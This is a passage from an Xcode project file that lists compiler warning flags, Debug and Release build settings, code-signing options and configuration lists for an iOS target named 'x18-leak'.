GCC_WARN_UNDECLARED_SELECTOR = YES; 224 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 225 | GCC_WARN_UNUSED_FUNCTION = YES; 226 | GCC_WARN_UNUSED_VARIABLE = YES; 227 | IPHONEOS_DEPLOYMENT_TARGET = 11.2; 228 | 
MTL_ENABLE_DEBUG_INFO = YES; 229 | ONLY_ACTIVE_ARCH = YES; 230 | SDKROOT = iphoneos; 231 | }; 232 | name = Debug; 233 | }; 234 | 5544C59A2044E240006514D9 /* Release */ = { 235 | isa = XCBuildConfiguration; 236 | buildSettings = { 237 | ALWAYS_SEARCH_USER_PATHS = NO; 238 | CLANG_ANALYZER_NONNULL = YES; 239 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 240 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 241 | CLANG_CXX_LIBRARY = "libc++"; 242 | CLANG_ENABLE_MODULES = YES; 243 | CLANG_ENABLE_OBJC_ARC = YES; 244 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 245 | CLANG_WARN_BOOL_CONVERSION = YES; 246 | CLANG_WARN_COMMA = YES; 247 | CLANG_WARN_CONSTANT_CONVERSION = YES; 248 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 249 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 250 | CLANG_WARN_EMPTY_BODY = YES; 251 | CLANG_WARN_ENUM_CONVERSION = YES; 252 | CLANG_WARN_INFINITE_RECURSION = YES; 253 | CLANG_WARN_INT_CONVERSION = YES; 254 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 255 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 256 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 257 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 258 | CLANG_WARN_STRICT_PROTOTYPES = YES; 259 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 260 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 261 | CLANG_WARN_UNREACHABLE_CODE = YES; 262 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 263 | CODE_SIGN_IDENTITY = "iPhone Developer"; 264 | COPY_PHASE_STRIP = NO; 265 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 266 | ENABLE_NS_ASSERTIONS = NO; 267 | ENABLE_STRICT_OBJC_MSGSEND = YES; 268 | GCC_C_LANGUAGE_STANDARD = gnu11; 269 | GCC_NO_COMMON_BLOCKS = YES; 270 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 271 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 272 | GCC_WARN_UNDECLARED_SELECTOR = YES; 273 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 274 | GCC_WARN_UNUSED_FUNCTION = YES; 275 | GCC_WARN_UNUSED_VARIABLE = YES; 276 | IPHONEOS_DEPLOYMENT_TARGET = 11.2; 277 | MTL_ENABLE_DEBUG_INFO = NO; 278 | SDKROOT = iphoneos; 
279 | VALIDATE_PRODUCT = YES; 280 | }; 281 | name = Release; 282 | }; 283 | 5544C59C2044E240006514D9 /* Debug */ = { 284 | isa = XCBuildConfiguration; 285 | buildSettings = { 286 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 287 | CODE_SIGN_STYLE = Automatic; 288 | DEVELOPMENT_TEAM = DEEG7TTSF2; 289 | INFOPLIST_FILE = "x18-leak/Info.plist"; 290 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 291 | PRODUCT_BUNDLE_IDENTIFIER = "com.github.bazad.x18-leak"; 292 | PRODUCT_NAME = "$(TARGET_NAME)"; 293 | TARGETED_DEVICE_FAMILY = "1,2"; 294 | }; 295 | name = Debug; 296 | }; 297 | 5544C59D2044E240006514D9 /* Release */ = { 298 | isa = XCBuildConfiguration; 299 | buildSettings = { 300 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 301 | CODE_SIGN_STYLE = Automatic; 302 | DEVELOPMENT_TEAM = DEEG7TTSF2; 303 | INFOPLIST_FILE = "x18-leak/Info.plist"; 304 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 305 | PRODUCT_BUNDLE_IDENTIFIER = "com.github.bazad.x18-leak"; 306 | PRODUCT_NAME = "$(TARGET_NAME)"; 307 | TARGETED_DEVICE_FAMILY = "1,2"; 308 | }; 309 | name = Release; 310 | }; 311 | /* End XCBuildConfiguration section */ 312 | 313 | /* Begin XCConfigurationList section */ 314 | 5544C5802044E23F006514D9 /* Build configuration list for PBXProject "x18-leak" */ = { 315 | isa = XCConfigurationList; 316 | buildConfigurations = ( 317 | 5544C5992044E240006514D9 /* Debug */, 318 | 5544C59A2044E240006514D9 /* Release */, 319 | ); 320 | defaultConfigurationIsVisible = 0; 321 | defaultConfigurationName = Release; 322 | }; 323 | 5544C59B2044E240006514D9 /* Build configuration list for PBXNativeTarget "x18-leak" */ = { 324 | isa = XCConfigurationList; 325 | buildConfigurations = ( 326 | 5544C59C2044E240006514D9 /* Debug */, 327 | 5544C59D2044E240006514D9 /* Release */, 328 | ); 329 | defaultConfigurationIsVisible = 0; 330 | defaultConfigurationName = Release; 331 | }; 332 | /* End XCConfigurationList section */ 333 | }; 334 | rootObject = 
5544C57D2044E23F006514D9 /* Project object */; 335 | } 336 | --------------------------------------------------------------------------------